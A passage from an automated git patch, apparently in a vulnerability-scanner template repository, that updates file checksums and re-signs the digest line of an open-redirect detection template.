http/cves/2015/CVE-2015-2196.yaml:41c3025eda3b296fadb3afb70e9f44ab5e855a86 http/cves/2015/CVE-2015-2755.yaml:153c44d93a107d184876d575101a5e3bae6ade75 http/cves/2015/CVE-2015-2794.yaml:22fea2657bd50593544f2ea1d4e1e61f7044f541 http/cves/2015/CVE-2015-2807.yaml:a32104390b45df0c648be1124edd91b81a398bd8 -http/cves/2015/CVE-2015-2863.yaml:e886adc4ab34cbe416003b6df1df1e2143034e1c +http/cves/2015/CVE-2015-2863.yaml:94f9d4de683bd0f7ed17d5cf945e89a3af50fd0f http/cves/2015/CVE-2015-2996.yaml:4a148288d459b04645da3f50f3d5ed9f2a569fe9 http/cves/2015/CVE-2015-3035.yaml:7e9bcc2539eee69c097358692a1fb05cec8af353 http/cves/2015/CVE-2015-3224.yaml:c3fa9504f5cba20a3037356578c60c6599bf4218 @@ -8539,7 +8539,7 @@ ssl/tls-version.yaml:4e40f08efbb39172b9280ea9e26ca5f0a14a575a ssl/untrusted-root-certificate.yaml:a91d36990a1d052f5ee64d170ad8f084d38dab19 ssl/weak-cipher-suites.yaml:62fe808d9dfafda67c410e6cb9445fdc70257e89 ssl/wildcard-tls.yaml:d244f62c7bd22d3868fc6fc7cb9550af6b261210 -templates-checksum.txt:25bd19e132c2fce0b56fadd4f103873df3529fea +templates-checksum.txt:4cfa9d7c34a68646e25c38e6844c2f4bb42ef473 wappalyzer-mapping.yml:7f03bd65baacac20c1dc6bbf35ff2407959574f1 workflows/74cms-workflow.yaml:bb010e767ad32b906153e36ea618be545b4e22d0 workflows/acrolinx-workflow.yaml:8434089bb55dec3d7b2ebc6a6f340e73382dd0c4 From cc6d313f0b7ce917a61fdefc9c5f418fa29cb1a3 Mon Sep 17 00:00:00 2001 From: GitHub Action <action@github.com> Date: Thu, 16 May 2024 07:50:18 +0000 Subject: [PATCH 375/375] Auto Template Signing [Thu May 16 07:50:18 UTC 2024] :robot: --- dast/vulnerabilities/redirect/open-redirect.yaml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/dast/vulnerabilities/redirect/open-redirect.yaml b/dast/vulnerabilities/redirect/open-redirect.yaml index e0ed92d112..8c36036bcc 100644 --- a/dast/vulnerabilities/redirect/open-redirect.yaml +++ b/dast/vulnerabilities/redirect/open-redirect.yaml @@ -179,4 +179,4 @@ http: - 301 - 302 - 307 -# digest: 4a0a004730450221009817b3fc85a64de37095f99e9bc9606b18a5a9ee3273af0405634e1b2760458c02201a1430837a69b1a03bece85a3966c0042aaddc52f45baedb9191e95936860b0c:922c64590222798bb761d5b6d8e72950 +# digest: 4b0a00483046022100e9bf67056b260dc2bc0f200f2d1853287f4f9b916a9a10f53fc7e643868df3200221008daacf7355ba1c40d34b672e78c096110e60601fdd1afa5932cd69b109c27d18:922c64590222798bb761d5b6d8e72950 \ No newline at end of file